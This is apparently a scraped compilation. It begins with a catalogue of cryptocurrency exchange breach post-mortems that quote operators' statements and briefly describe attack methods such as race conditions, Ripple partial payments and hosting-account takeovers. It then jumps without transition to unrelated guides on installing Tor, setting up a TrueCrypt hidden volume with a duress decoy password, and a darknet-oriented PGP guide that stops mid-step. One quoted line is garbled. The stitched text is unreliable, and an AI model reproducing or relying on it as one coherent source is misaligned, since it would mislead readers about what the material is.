Bitstamp experienced a security breach on Jan. 4th. Security of our customers’ bitcoin and information is a top priority for us, and as part of our stringent security protocol we temporarily suspended our services on January 5th. All bitcoin held with us prior to the temporary suspension of services starting on January 5 (at 9 a.m. UTC) are completely safe and will be honored in full. We are currently investigating and will reimburse all legitimate deposits to old wallet addresses affected by the breach after the suspension.
A small hot wallet compromise, although uncertain how they were accessed.
Dear Customer although we keep over 99.5% of users’ BTC deposits in secure multisig wallets, the small remaining amount in coins in our hot wallet are theoretically vulnerable to attack. We believe that our hot wallet keys might have been compromised and ask that all of our customer cease depositing cryptocurrency to old deposits addresses. We are in the process of creating a new hot wallet and will advise within the next few hours. Although this incident is unfortunate, its scale is small and will be fully absorbed by the company. Thanks a lot for your patience and comprehension. Bitfinex Team”
An attacker used a simple account takeover with multiple pivots to gain server access to a wallet.
With administrative access to WordPress, the attacker was able to upload PHP based tools to explore the filesystem and discover stored secrets. From there, database credentials were accessed and another PHP based database tool was used to access a database and modify a off-chain ledger. The attacker then dodged double accounting systems by discovering loopholes around the purchase/sale of bitcoins.
This deserves a full read and is one of the better post mortems in the graveyard.
Around 8PM on Sunday (all times EDT) our marketing director’s blog account requested a password reset. Up until the writing of this post (Wednesday morning, 10am) we do not know how the thief managed to know the marketing director’s (will refer to this as MD from here) account. Our best guess is it was an educated guess based on info found (more on that in a moment). The MD saw this email come in, and forwarded it to myself, and another team member (a technical lead/temporary assistant support staff), letting us know what happened and that he did not request the password reset. I did not see the email at the time, as I was out, and it was not a huge red flag that would require a phone call. Once I returned home later, I saw the email, and logged into the server to double-check on things. That’s when I discovered the breach.
Apparently, the thief had gained access to the tech assistant’s email account. That email was hosted on a private server (not gmail, yahoo, etc). We have no idea how the password was acquired. We spent a lot of time this week downloading password lists from torrents, tor sites, etc, and could find his password in none of the lists. He assures us he did not use the password in multiple places, and that it was a secure password. Our best guess is that it was a brute force attempt. The mail server he uses used the dovecot package for IMAP mail, which, for reasons we cannot comprehend, does NOT log failed password attempts by default. Because of this, at first, we believed that the hacker somehow had the person’s password. But we do not know, and there is no way to know at this point how the password was found.
Application vulnerability involving a race condition for multiple currencies at Cryptoine.
According to a statement on the Cryptoine website, the firm claims that a “hacker found some race condition bug in our trading engine. Manipulation of orders gave him false balances.”
In a further update, Cryptoine claims that the hack only targeted hot wallets, saying that “our hot wallets was [sic] drained, coins: bitcoin, litecoin, urocoin, dogecoin, bitcoinscrypt, magi, darkcoin, dogecoindark, cannabis” but promises that all coins they still have will be returned to users “in correspondingly smaller quantities.”
Not much detail, other than a database breach and it seems all customers were paid back.
Effective immediately, CAVIRTEX intends to cease carrying on an active Bitcoin business and will be winding down its operations in an orderly manner. As a result, effective immediately, no new deposits will be accepted by CAVIRTEX. Trading on CAVIRTEX will be halted effective March 20, 2015. Effective March 25th, 2015, no withdrawals will be processed. CAVIRTEX will communicate with any account holders that continue to hold balances after March 25, 2015.
We have maintained 100% reserves. CAVIRTEX is solvent and remains in a position to accommodate all customer withdrawal requests received prior to March 25, 2015. However, On February 15, 2015 we found reason to believe that an older version of our database, including 2FA secrets and hashed passwords, may have been compromised. This database did not include identification documents.
Not much data, other than the name of a hacker and that they stole the entire wallet, shutting down ExCoin.
February 6th and 10th, the user ‘Ambiorx’ was able to gain access to all the Bitcoins on the Exco.in exchange. As a result we no longer have the means necessary to continue operation and are deeply saddened to announce we will be shutting down operations this month. The trading engine has been disabled and Exco.in user accounts will remain active, with the exception of Ambiorx’s account and those who may be affiliated.
Cloud infrastructure account takeover without a lot of detail.
Several hours ago one of our hosting accounts was hacked and the hacker got 50m NXT from this server.
It’s totally our fault and we are trying our best to cover all the loss. However 50m nxt is huge for us, we cannot afford it at the moment.
Not much information available, other than the victim stating that the hacker was putting a lot of effort towards their attack.
We have been constantly monitoring the hacking activities on our servers and 3 months back then we took the precautionary step to migrate our servers to a highly secured cloud site. Unfortunately, that didn’t stop the incident from happening last night. In the last 24 hours, our security team worked around the clock to trace back the codes and processes. At this moment, we have a pretty good idea of exactly how they did it. This was not a generalized attack. The hacker’s strategy was precisely calculated and well targeted to compromise a certain weakness on our server.
Cold storage is said to have limited losses greatly.
The consequence, allegedly, is that hackers sent deposit transactions for large amounts, e.g. 100,000, to Justcoin. They set the tfPartialPayment flag to something like .0001. The transaction would be perfectly valid, and any client unaware of this behavior in the protocol would likely not be checking for the DeliveredAmount field – since it was never documented until a week ago. The transaction Amount field says “100,000” but the DeliveredAmount is only .0001. The hacker gets credit for 100,000 but only deposits .0001. Then they make a small withdrawal, check the balance on the hotwallet address and drain as much as they can.
Ripple commented on the issue here and puts blame squarely on Justcoin’s implementation.
Justcoin did not implement partial payments correctly. The exchange falsely credited a non-KYC’d user for a deposit, and then allowed the user to illegitimately withdraw the funds from its hot wallet. For every transaction, an exchange needs to ensure the total of user balances plus the new deposit matches the balance of its Ripple cold and hot wallets. If these balances don’t match, the exchange should stop processing the transaction. Ripple Labs has engaged Justcoin in ongoing discourse about its lack of risk and compliance controls. As demonstrated by this incident, a non-KYC’d user can steal with little fear of being identified and owning the consequences.
Not much data available, other than that a hacker supposedly stole a wallet and then extorted the operator for further funds.
While preparing for the final audit results, a task we were working on for weeks now, our bitcoin wallet has been hacked and emptied, just after exchanging our fiat holdings within the exchanges to bitcoin and transferring our entire holdings to our wallet, in order to proof our solvency.
It is a known fact that I personally opposed any proof of solvency, but agreed to conduct it for the sake of a few dozen small and medium investors.
The hacker contacted me shortly after he took advantage of our holdings and demanded a ransom in order to transfer the coins back. I have agreed to a 25% ransom of the entire sum, but haven’t heard back from him for several days now.
Very traditional application vulnerability (SQL injection) that was brought in by a third party library. This modified their “escrow” product.
Whilst we have not yet completed our investigation, we have identified the attack vector as a vulnerability in a third party plugin. This was used to inject SQL queries into our database and manipulate the amounts on transactions being released from escrow. What we have not made public until now is that we have seen sustained and almost-daily attack attempts on the site for many months. We have been in contact with the Australian Federal Police regarding this, and will be sharing with them all data that we have on this attack as well as all previous attempts.
Little information provided.
A few hours ago we were unfortunately the subject of a successful attack against the exchange. Our investigations have shown that whilst our security was breached, VeriCoin was the target. We would like to stress that VeriCoin and the VeriCoin network has not been in any way compromised. We have worked to secure the exchange and the withdraw process from any further attack.
Little information provided, though the attackers seemed to have accessed the DogeVault servers and accessed a wallet directly.
We regret to announce that on the 11th of May, attackers compromised the Doge Vault online wallet service resulting in wallet funds being stolen. After salvaging our wallet we have ascertained that around 280 million Dogecoins were taken in the attack, out of a total balance of 400 million kept in our hot wallet. 120 million Dogecoins have been since recovered and transferred to an address under our control. It is believed the attacker gained access to the node on which Doge Vault’s virtual machines were stored, providing them with full access to our systems. It is likely our database was also exposed containing user account information; passwords were stored using a strong one-way hashing algorithm. All private keys for addresses are presumed compromised, please do not transfer any funds to Doge Vault addresses.
Not enough information, other than a infrastructure intrusion that breached the wallet.
Long story short: yes, our wallet server got hacked and all funds were withdrawn.
Poloniex is a Bitcoin exchange that has been operating since 2014. In March of 2014, an Application Vulnerability was exploited and
caused a loss of 97 BTC (a 12.3% loss on the exchange). The reported cause of the hack was that they did not properly check for a negative account balance
while processing multiple, simultaneous withdrawals.
The hacker found a vulnerability in the code that takes withdrawals. The hacker discovered that if you place several withdrawals
all in practically the same instant, they will get processed at more or less the same time. This will result in a negative
balance, but valid insertions into the database, which then get picked up by the withdrawal daemon.
What Will Be Done to Prevent Further Exploits?
Withdrawals and order creation have been switched to a queued method, where the first step is to add the task to a global
execution queue that is processed sequentially. Each step of critical database operations is verified before proceeding, and such
operations are in the process of being converted to transactions. I have hired additional developers to help with tightening up
security at Poloniex, as well as created a bug bounty.
“Front End” flaw implies an application vulnerability involving transactions between users of their application. It sounds like a race condition given the use of thousands of requests that were necessary to deplete the wallet before the off-chain ledger could update.
During the investigation into stolen funds we have determined that the extent of the theft was enabled by a flaw within the front-end. The attacker logged into the flexcoin front end from IP address 220.127.116.11 under a newly created username and deposited to address 1DSD3B3uS2wGZjZAwa2dqQ7M9v7Ajw2iLy. The coins were then left to sit until they had reached 6 confirmations. The attacker then successfully exploited a flaw in the code which allows transfers between flexcoin users. By sending thousands of simultaneous requests, the attacker was able to “move” coins from one user account to another until the sending account was overdrawn, before balances were updated.
If you trust the operators, they blame the famous “[transaction malleability]” vulnerability.
Our initial investigations indicate that a vendor exploited a recently discovered vulnerability in the Bitcoin protocol known as “transaction malleability” to repeatedly withdraw coins from our system until it was completely empty.
Very little information available.
As a result of a hacker attack it was robbed portfolio BTC and LTC. This fact was reported to law enforcement authorities.
They were stolen currency BTC and LTC belonging to all users. If they recover they will be returned to users in accordance with the state of the balance on the day 17.11.2013r.
This was a clear application vulnerability with a potentially fraudulent cover up and incident response. On July 28, 2013, hackers discovered an application condition that allowed them to credit accounts from a wallet supporting multiple organizations (Bitfunder and WeExchange). While the SEC found fraud, this seems to be more related to handling of the breach and operating an unregistered exchange.
During the summer of 2013, one or more individuals (the “Hackers”) exploited a weakness in the BitFunder programming code to cause BitFunder to credit the Hackers with profits they did not, in fact, earn (the “Exploit”). As a result, the Hackers were able to wrongfully withdraw from WeExchange approximately 6,000 bitcoins, with the majority of those coins being wrongfully withdrawn between July 28, 2013, and July 31, 2013. In today’s value, the wrongfully withdrawn bitcoin were worth more than $60 million. As a result of the Exploit, BitFunder and WeExchange lacked the bitcoins necessary to cover what MONTROLL owed to users.
Cloud infrastructure account takeover. Some kind of 2FA bypass exploit as well. Source code, wallets, and user data exfiltrated by attacker.
Two hacks totalling about 4100 BTC have left Inputs.io unable to pay all user balances. The attacker compromised the hosting account through compromising email accounts (some very old, and without phone numbers attached, so it was easy to reset). The attacker was able to bypass 2FA due to a flaw on the server host side. Database access was also obtained, however passwords are securely stored and are hashed on the client. Bitcoin backend code were transferred to 10;[email protected]:[email protected] (most likely another compromised server).
Cloud infrastructure compromise. After an initial credential breach, the attacker escalated access through social engineering. The victim blames the hosting provider for violating their own procedure for password resets.
The attacker has acquired login credentials to our VPS control account with our hosting service provider and has then asked for the root password reset of all servers which – unfortunately – the service provider has then done and posted the credentials in their helpdesk ticket, rather than the standard process of sending it to our email address (which has 2FA protection), also the security setup of allowing only our IP range to login to the management console was not working. It was an additional security feature the provider offered but was obviously circumvented by the attacker. As a result out of this incident we have moved all our services to a new provider who offers 2 factor authentication for all
logins as well as other verification processes that we hope will make similar attempts impossible in the future
This was an account takeover on the victim’s cloud provider, allowing access to a server hosting a hot wallet. This was part of a larger breach.
Someone managed to reset the password from our hosting provider web interface, this enabled the attacker to lock us out of the interface and request a reboot of the machine in ‘rescue’ mode. Using this, the attacker copied our hot wallet and sent away what was present.
This very hosting provider (OVH) had been compromised a couple of days ago, in the exact same way, leading to loss of funds on mining.bitcoin.cz.
Given that a database was accessed, this was probably a breach of infrastructure. Their comment about being “impossible to reopen” makes me wonder if it was off-chain and if they couldn’t trust their ledger.
The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is.
This is a tough translation but it seems like a clear application vulnerability involving some kind of coupon code system.
The Bitcoin market suffered an attack, which unfortunately was successful in its implementation redeem code. Due to a coding error, it was possible for an attacker to generate new credit codes, without the value was properly charged to your final balance. Getting thus generate a false amount of bitcoins within the system and rescue him in time during the night.
Attacker pivoted several times after initially gaining access to the victim’s domain registrar via social engineering. This then allowed a DNS hijack, allowing them to route password resets to the attacker. Attacker then took over cloud infrastructure hosting wallets.
The attacker contacted our domain registrar at Site5 posing as me and using a very similar email address as mine, they did so by proxying through a network owned by a haulage company in the UK whom I suspect are innocent victims the same as ourselves. Armed with knowledge of my place of birth and mother’s maiden name alone (both facts easy to locate on the public record) they convinced Site5 staff to add their email address to the account and make it the primary login (this prevented us from deleting it from the account). We immediately realized what was going on, and logged in to change the information back. After changing this info and locking the attacker out, overnight he was able to revert my changes and point our website somewhere else. Site5 is denying any damages, but we suspect this was partly their fault.
After gaining access, they redirected DNS by pointing the nameservers to hetzner.de in germany, they used hetzner’s nameservers to redirect traffic to a hosting provider in ukraine. By doing this, he locked out both my login and Gareths’s login and they used this to hijack our emails and reset the login for one exchange (VirWox), enabling them to gain access and steal $12,480 USD worth of BTC. No other exchanges were affected due to either Mult Factor Authentication, OTP, Yubikey’s and auto lockdowns.
The hacker was also able to pull a few hours of internal company emails. However due to mandatory PGP encrytion between members of our company and tools like Cryptocat, sensitive information was not breached.
The big one. Lots of speculation and not a lot of hard data. Everything from negligence, insider threat, and fraud has been speculated.
On Monday night, a number of leading Bitcoin companies jointly announced that Mt. Gox, the largest exchange for most of Bitcoin’s existence, was planning to file for bankruptcy after months of technological problems and what appeared to have been a major theft. A document circulating widely in the Bitcoin world said the company had lost 744,000 Bitcoins in a theft that had gone unnoticed for years. That would be about 6 percent of the 12.4 million Bitcoins in circulation.
Mark Karpeles, the former CEO of Mt. Gox, told the Daily Beast last month, “I suspect that some of the missing bit coins were taken by a company insider but when I tried to talk to the police about it, they seemed disinterested.
Attackers likely gained access through a cloud infrastructure provider and accessed a server with unencrypted hot wallet.
Last night, a few of our servers were compromised. As a result, the attacker gained accesses to an unencrypted backup of the wallet keys (the actual keys live in an encrypted area). Using these keys they were able to transfer the coins. This attack took the vast majority of the coins BitFloor was holding on hand. As a result, I have paused all exchange operations. Even tho only a small majority of the coins are ever in use at any time, I felt it inappropriate to continue operating not having the capability to cover all account balances for BTC at the time.
Infrastructure breach with access to a large hot wallet.
It is with much regret that we write to inform our users of a recent security breach at Bitcoinica. At approximately 1:00pm GMT, our live production servers were compromised by an attacker and they used this access to deplete our online wallet of 18547 BTC.
A breach at Linode was the root cause here and there’s plenty of information to understand the breach. Credentials for a customer support team member were used and eight Linode customers were compromised for having affliations to bitcoin.
After accessing the customer support interface, the attacker was able to access the individual account interface for their victims and change root passwords on customer’s machines. To apply this root password change, servers were rebooted.
A VP at Linode responded.
Somebody hacked my backup machine with pool data hosted on Linode and steal 3094 BTC (“hot” coins ready for payouts). Cold backup was not affected in any way by this hack.
It looks that also user database has been compromised. Although passwords are stored in SHA1 with salt, I strongly recommend to change your password on the pool immediately.
Robery of Bitcoins has no impact to pool users, I’m covering the loss from my own income (although it means that many months of my work is wasted Roll Eyes ).
Attackers made it onto Bitcoin7 infrastructure, due to wallets and database data being accessed. Given that “other websites” were owned, it’s possible a larger unknown shared hosting provider with other customers was compromised.
On Oct 5th 2011 Bitcoin7.com became the victim of a number of pre-planned hacker attacks. While our investigation is still going, evidence reveals that the attacks originated from Russia and Eastern Europe.
The attack itself took action not only against the bitcoin7.com server but also against other websites and servers which were part of the same network. Eventually the hackers managed to breach into the network which subsequently lead to a major breach into the bitcoin7.com website.
As a result of the hacking, unknown individuals managed to gain full access to the site’s main bitcoin depository/wallet and 2 of the 3 backup wallets.
In addition the hackers gained access to our user database.
This sounds like an application vulnerability that allowed forged deposits that could eventually be withdrawn from a hot wallet. This sort of attack is more common with “off blockchain” wallets.
After careful analysis of the intrusion we have concluded that the software that waited for Bitcoin confirmations was far too lenient. An unknown attacker was able to forge Bitcoin deposits via the Shopping Cart Interface (SCI) and withdraw confirmed/older Bitcoins. This led to a slow trickle of theft that went unnoticed for a few days. Luckily, we do keep a percentage of the holdings in cold storage so the attackers didn’t completely clean us out. Just to clarify, we weren’t “fully” hacked aka “rooted”. You can still trust our PGP, SSL, and Tor public keys.
The cause is very uncertain. The operator suspects a third party destroying a host on AWS, but it looks like operator error is highly possible due to the “breach” occurring during a major upgrade.
On 26 July 2011, at about 23:00 am, I have found the overloaded the Bitcoin server and I had to increase the RAM. As a result of this operation, the entire virtual machine was removed, and with it all the information, including the wallet and all of its backups. I have found that the data did not go into Nirvana because the Virtual Machine settings have >been changed, even though I have changed even nothing. Our Hoster, Amazon Web Services Company, indicates that the deleted machine was adjusted so that they are once you shut down irrevocably “destroyed” (including all data on the hard disks).
I am still determine who changed the settings on the VM and whether it is possible to recover the deleted data. Unfortunately, the collaboration with Amazon Web Services (AWS) to be very difficult. Once I realized that the virtual machine is lost, I immediately ordered AWS premium support, talked to the manager and asked for protection of my data. So far without success.
To this day I could not find out the exact reasons for the misery. I suspect the actions of third parties, which wanted to cover up their illegal activities, or even wanted to crash the whole service, responsible for them. Should my suspicions in that direction harden, I’ll go with the case to the police and prosecutor’s office. For this I need but the cooperation between AWS and which is (as mentioned above) currently very difficult. Efforts of data recovery are of course still in progress.
Recently, BoingBoing ran an article about how some librarians in Massachusetts were installing Tor software in all their public PCs to anonymize the browsing habits of their patrons. The librarians are doing this as a stand against passive government surveillance as well as companies that track users online and build dossiers to serve highly-targeted advertising.
It’s an interesting project and a bold stand for user privacy. But the good news is that if you want to browse anonymously, you don’t have to go to the library to use Tor. Connecting to the Tor network from your own PC is quick and painless thanks to the Tor project’s dead simple Tor Browser.
What is Tor?
Tor is a computer network run by volunteers worldwide. Each volunteer runs what is called a relay, which is just a computer that runs software allowing users to connect to the Internet via the Tor network.
Before hitting the open Internet, the Tor Browser will connect to several different relays, wiping its tracks each step of the way, making it difficult to figure out where, and who, you really are.
While Tor is gaining a reputation as a tool for buying illicit goods online, the software has numerous legitimate uses. Activists masking their location from oppressive regimes and journalists communicating with anonymous sources are two simple examples.
If, like the librarians in Massachusetts, you don’t have an exotic reason for using Tor, it’s still a good tool to keep your browsing private from your ISP, advertisers, or passive government data collection. But if the NSA or other three-letter agency decided to actively target your browsing habits that’s a whole different ballgame.
The easiest way to use Tor is to download the Tor Browser [official link]. This is a modified version of Firefox along with a bunch of other software that connects you to the Tor network.
Once you’ve downloaded the installer, you have two options: You can just install the software or you can check the installation file’s GPG signature first. Some people like to check the installation file to make sure they’ve downloaded the proper version of the browser and not something that’s been tampered with.
But checking the GPG signature is not a painless process and requires an additional software download. Nevertheless, if that’s something you’d like to do, the Tor Project has a how-to explaining what’s required [official link].
Whether or not you’ve checked the GPG signature, the next step is to install the Tor browser itself.
You can install the Tor browser on a USB stick.
For Windows, the Tor Browser comes as an EXE file, so it’s basically like installing any other program. The key difference is that the browser doesn’t have the same default location as most programs. Instead, it offers your desktop as the install location.
The Tor browser does this because it is portable software and doesn’t integrate into a Windows system the way typical programs do. This means you can run the Tor browser from almost anywhere—the Desktop, your documents folder, or even a USB drive.
When you arrive at the Choose install location window Click Browse… and then choose where you’d like to install the browser. As you can see in the image above, I installed it to a USB drive that I tote around on my key chain.
Once you’ve got your location selected, just press Install and Tor takes care of the rest.
Using the Tor Browser
Once the browser is installed, you’ll have a plain old folder called Tor Browser. Open that and inside you’ll see “Start Tor Browser.exe”. Click that file and a new window opens asking whether you’d like to connect directly to the Tor network or if you need to configure proxy settings first.
Most people can simply connect directly to the Tor network to get started. (Click to enlarge.)
For most people, choosing the direct option is best, so choose Connect. A few seconds later a version of Firefox will launch and you are now connected to the Tor network and able to browser in relative anonymity.
To make sure you’re connected to Tor go to whatismyip.com, which will automatically detect your location based on your Internet Protocol address. If your browser shows you coming from a location that is not your own, you are good to go. Just make sure you do all your anonymous browsing from the Tor Browser itself as other programs on your system are not connected to Tor.
But browsing anonymously on Tor isn’t quite as easy as booting up a program. There are also some rules of the road you should observe, such as connecting to every site possible via SSL/TSL encryption (HTTPS). If you don’t, then anything you do online can be observed by the person running your exit node. The browser has the Electronic Frontier Foundation’s HTTPS Everywhere add-on installed by default, which should cover your SSL/TSL needs most of the time.
The Tor Project has more tips on browsing anonymously [official link].
Also, remember that browsing in anonymity does not make you immune to viruses and other malware. If you are going to the seedier parts of the Internet, Tor cannot protect you from malicious software that could be used to reveal your location.
For the average Internet user, however, the Tor Browser should be enough to stay private online. You can also check available Tor friendly VPN services with no logs [link].
If you save anything on your computer, it is likely that you do not want just anyone to be able to see what you have saved. You want a way to protect that information so that you can access it, and absolutely no one else except those you trust. Therefore, it makes sense to set up a system which protects your information and safeguards it against prying eyes.
The best such system for this is called “True Crypt”. “True Crypt” is an encryption software program which allows you to store many files and directories inside of a single file on your harddrive. Further, this file is encrypted and no one can actually see what you have saved there unless they know your password.
This sounds extremely high tech, but it is actually very easy to set up.
Setting up Truecrypt
1. Go to http://www.truecrypt.org/downloads (or go to www.truecrypt.org, and click on “Downloads”)
2. Under “Latest Stable Version”, under “Windows 7/Vista/XP/2000?, click “Download”
3. The file will be called “True Crypt Setup 7.0a.exe” or something similar. Run this file.
4. If prompted that a program needs your permission to continue, click “Continue”.
5. Check “I accept and agree to be bound by these license terms”
6. Click “Accept”
7. Ensure that “Install” is selected, and click “Next”
8. click “Install”
9. You will see a dialog stating “TrueCrypt has been successfully installed.” Click “Ok”
10. Click “No” when asked if you wish to view the tutorial/user’s guide.
11. Click “Finish”
At this point, TrueCrypt is now installed. Now we will set up truecrypt so that we can begin using it to store sensitive information.
1. Click the “Windows Logo”/”Start” button on the lower left corner of your screen.
2. Click “All Programs”
3. Click “TrueCrypt”
4. Click the “TrueCrypt” application
And now we can begin:
1. click the button “Create Volume”
2. Ensuring that “Create an encrypted file container” is selected, click “Next”
3. Select “Hidden TrueCrypt volume” and click “Next”.
4. Ensuring that “Normal mode” is selected, click “Next”
5. Click on “Select File”
Note which directory you are in on your computer. Look at the top of the dialog that has opened and you will see the path you are in, most likely the home directory for your username. An input box is provided with a flashing cursor asking you to type in a file name. Here, you will type in the following filename:
You may of course replace random.txt with anything you like. This file is going to be created and will be used to store many other files inside. Do NOT use a filename for a file that already exists. The idea here is that you are creating an entirely new file.
It is also recommended though not required that you “hide” this file somewhere less obvious. If it is in your home directory, then someone who has access to your computer may find it easier. You can also choose to put this file on any other media, it doesn’t have to be your hard disk. You could for example save your truecrypt file to a usb flash drive, an sd card, or some other media. It is up to you.
6. Once you have typed in the file name, click “Save”
7. Make sure “Never save history” is checked.
8. Click “Next”
9. On the “Outer Volume” screen, click “Next” again.
10. The default Encryption Algorithm and Hash Algorithm are fine. Click “Next”
11. Choose a file size.
In order to benefit the most from this guide, you should have at least 10 gigabytes of free disk space. If not, then it is worth it for you to purchase some form of media (such as a removable harddrive, a large sd card, etc.) in order to proceed. TrueCrypt can be used on all forms of digital media not just your hard disk. If you choose to proceed without obtaining at least ten gigabytes of disk space, then select a size that you are comfortable with (such as 100 MB).
Ideally, you want to choose enough space to work with. I recommend 20 GB at least. Remember that if you do need more space later, you can always create additional TrueCrypt volumes using exactly these same steps.
12. Now you are prompted for a password. THIS IS VERY IMPORTANT. READ THIS CAREFULLY
READ THIS SECTION CAREFULLY
The password you choose here is a decoy password. That means, this is the password you would give to someone under duress. Suppose that someone suspects that you were accessing sensitive information and they threaten to beat you or worse if you do not reveal the password. THIS is the password that you give to them. When you give someone this password, it will be nearly impossible for them to prove that it is not the RIGHT password. Further, they cannot even know that there is a second password.
Here are some tips for your password:
A. Choose a password you will NEVER forget. It may be ten years from now that you need it. Make it simple, like your birthday repeated three times.
B. Make sure it seems reasonable, that it appears to be a real password. If the password is something stupid like “123? then they may not believe you.
C. Remember that this is a password that you would give to someone if forced. It is *NOT* your actual password.
D. Do not make this password too similar to what you plan to really use. You do not want someone to guess your main password from this one.
And with all of this in mind, choose your password. When you have typed it in twice, click “Next”.
13. “Large Files”, here you are asked whether or not you plan to store files larger than 4 GIGABYTES. Choose “No” and click “Next”
14. “Outer Volume Format”, here you will notice some random numbers and letters next to where it says “Random Pool”. Go ahead and move your mouse around for
a bit. This will increase the randomness and give you better encryption. After about ten seconds of this, click “Format”.
15. Depending on the file size you selected, it will take some time to finish formatting.
“What is happening?”
TrueCrypt is creating the file you asked it to, such as “random.txt”. It is building a file system contained entirely within that one file. This file system can be used to store files, directories, and more. Further, it is encrypting this file system in such a way that without the right password it will be impossible for anyone to access it. To *anyone* other than you, this file will appear to be just a mess of random characters. No one will even know that it is a truecrypt volume.
16. “Outer Volume Contents”, click on the button called, “Open Outer Volume”
An empty folder has opened up. This is empty because you have yet to put any files into your truecrypt volume.
DO NOT PUT ANY SENSITIVE CONTENT HERE
This is the “Decoy”. This is what someone would see if you gave them the password you used in the previous step. This is NOT where you are going to store your sensitive data. If you have been forced into a situation where you had to reveal your password to some individual, then that individual will see whatever is in this folder. You need to have data in this folder that appears to be sensitive enough to be protected by truecrypt in order to fool them. Here are some important tips to keep in mind:
A. Do NOT use porn. Adult models can sometimes appear to be underaged, and this can cause you to incriminate yourself unintentionally.
B. Do NOT use drawings/renderings/writings of porn. In many jurisdictions, these are just as illegal as photographs.
C. Good choices for what to put here include: backups of documents, emails, financial documents, etc.
D. Once you have placed files into this folder, *NEVER* place any more files in the future. Doing so may damage your hidden content.
Generally, you want to store innocent data where some individual looking at it would find no cause against you, and yet at the same time they would understand why you used TrueCrypt to secure that data.
Now, go ahead and find files and store them in this folder. Be sure that you leave at least ten gigabytes free. The more the better.
When you are all done copying files into this folder, close the folder by clicking the “x” in the top right corner.
17. click “Next”
18. If prompted that “A program needs your permission to continue”, click “Continue”
19. “Hidden Volume”, click “Next”
20. The default encryption and hash algorithms are fine, click “Next”
21. “Hidden Volume Size”, the maximum available space is indicated in bold below the text box. Round down to the nearest full unit. For example, if 19.97 GB
is available, select 19 GB. If 12.0 GB are available, select 11 GB.
22. If a warning dialog comes up, asking “Are you sure you wish to continue”, select “Yes”
23. “Hidden Volume Password”
IMPORTANT READ THIS
Here you are going to select the REAL password. This is the password you will NEVER reveal to ANYONE else under any circumstances. Only you will know it. No one will be able to figure it out or even know that there is a second password. Be aware that an individual intent on obtaining your sensitive information may lie to you and claim to be able to figure this out. They cannot.
It is HIGHLY recommended that you choose a 64 character password here. If it is difficult to remember a 64 character password, choose an 8 character password and simply repeat it 8 times. A date naturally has exactly 8 numbers, and a significant date in your life repeated 8 times would do just fine.
24. Type in your password twice, and click “Next”
25. “Large Files”, select “Yes” and click “Next”.
26. “Hidden Volume Format”, as before move your mouse around for about ten seconds randomly, and tehn click “Format”.
27. If prompted “A program needs your permission to continue”, select “Continue”
28. A dialog will come up telling you that the hidden TrueCrypt volume has been successfully created. Click “Ok”
29. Click “Exit”
Congratulations! You have just set up an encrypted file container on your hard drive. Anything you store here will be inaccessible to anyone except you. Further, you have protected this content with TWO passwords. One that you will give to someone under threat, and one that only you will know. Keep your real password well protected and never write it down or give it to anyone else for any reason.
Now, we should test BOTH passwords.
Testing TrueCrypt Volumes
Once you have completed the above section, you will be back at TrueCrypt. Go ahead and follow these steps to test the volumes you have made.
1. Click “Select File…”
2. Locate the file you created in the last section, most likely called “random.txt” or something similar. Remember that even though there is both an outer and
a hidden volume, both volumes are contained in a single file. There are not two files, only one.
3. Click “Open”
4. Choose a drive letter that you are not using (anything past M is probably just fine). Click on that, For example click on “O:” to highlight it.
5. Click “Mount”
6. Now you are prompted for a password. Read the below carefully:
The password you provide here will determine WHICH volume is mounted to the drive letter you specified. If you type in your decoy password, then O: will show all the files and directories you copied that you would reveal if forced. If you type in your real password, then O: will show the files and directories that you never intend anyone to see.
7. After successfully typing in your password, you will see additional detail to the right of the drive letter, including the full path to the file you selected as well as the kind of volume it is (for example, hidden).
8. Right click on your “Windows Logo”/”Start Menu” icon, and scroll down to the bottom where you can see your different drive letters. You will see the drive letter you selected, for example: “Local Disk (O:)”. Click on that.
9. If you selected your decoy password, you will see all the files and folders that you moved there during the installation phase. If you selected the real password, you will see whatever files and directories you have placed so far into the hidden volume, if any.
If you selected your hidden volume password, you may now begin moving any sensitive information you wish. Be aware that simply moving it from your main hard disk is not enough. We will discuss how to ensure deleted data is actually deleted later in the guide.
“What is happening?”
When you select a file and mount it to a drive, you are telling your computer that you have a new drive with files and folders on it. It is the same thing as if you had plugged in a usb flash drive, a removable harddrive, or an sd card into your computer. TrueCrypt causes your computer to think that there is an entirely new disk drive on your computer. You can use this disk drive just as if it *was* actually a usb flash drive. You can copy files to it, directories, and use it just as you would use a usb flash drive.
When you are done, simply close all open windows/folders/applications that are using your truecrypt drive letter, and then click “Dismount” from within TrueCrypt while you have the drive letter highlighted. This will once again hide all of this data, accessible only by re-mounting it with the correct password.
VERY IMPORTANT SAFETY INFORMATION
When a true crypt hidden volume is mounted, someone who has access to your computer can access anything that is inside that hidden volume. If for example you left your computer running while a truecrypt volume was mounted, then if someone gained access to your computer they would be able to see everything you have in that volume. Therefore:
ALWAYS REMEMBER TO DISMOUNT ANY TRUECRYPT VOLUME CONTAINING ANY SENSITIVE INFORMATION WHEN YOU ARE NOT USING YOUR COMPUTER
You can tell that it is dismounted because the drive letter inside of “TrueCrypt”‘s control panel will appear the same as all of the other drive letters, with no information to the right of the drive letter.
You should practice Mounting and Dismounting a few times with both passwords to make sure you understand this process.
Once you have copied files/folders into the hidden volume, do NOT touch the files or folders in the outer volume anymore. Remember that both volumes occupy the same single file, and therefore changing the outer volume can damage the hidden volume. Once you have copied files/folders into the outer volume during the installation process, that is the last time you should do so. From that point forward, use ONLY the hidden volume. The outer volume exists only as a decoy if you need it.
Part 0 – Introduction
Here’s my basic guide for PGP on OS X. The OS in question is OS X 10.9 Mavericks, but it should still work for other versions. As for the tool itself, we’ll be using GPG Suite Beta 5. This is my first time using OS X in… years. If you see anything I’m doing wrong, or could be done easier, feel free to correct me in the comments.
If you’ve done your research, you’ll see it’s not recommended to do anything darknet related on OS X, but I’m not going to go over the details here. You’ve obviously made your decision.
Part 1 – Installing the software
Like I said above, we’ll be using GPG Suite Beta 5. If you’re curious and want to see the source code, you can do so here.
- Head on over to https://gpgtools.org, and download ‘GPG Suite Beta 5’
- Open the file you downloaded, you should see this screen. Double click on ‘Install’
- Follow the installation process. If successful, you should see this screen. You can now close the window
Part 2 – Creating your keypair
GPG Suite actually makes this a super simple process. Just like the Linux guide, we’ll be using 4096 bit length for encryption.
- Open up GPG Keychain, you should be greeted by this beautiful window
- Click ‘New’ at the top left of the window
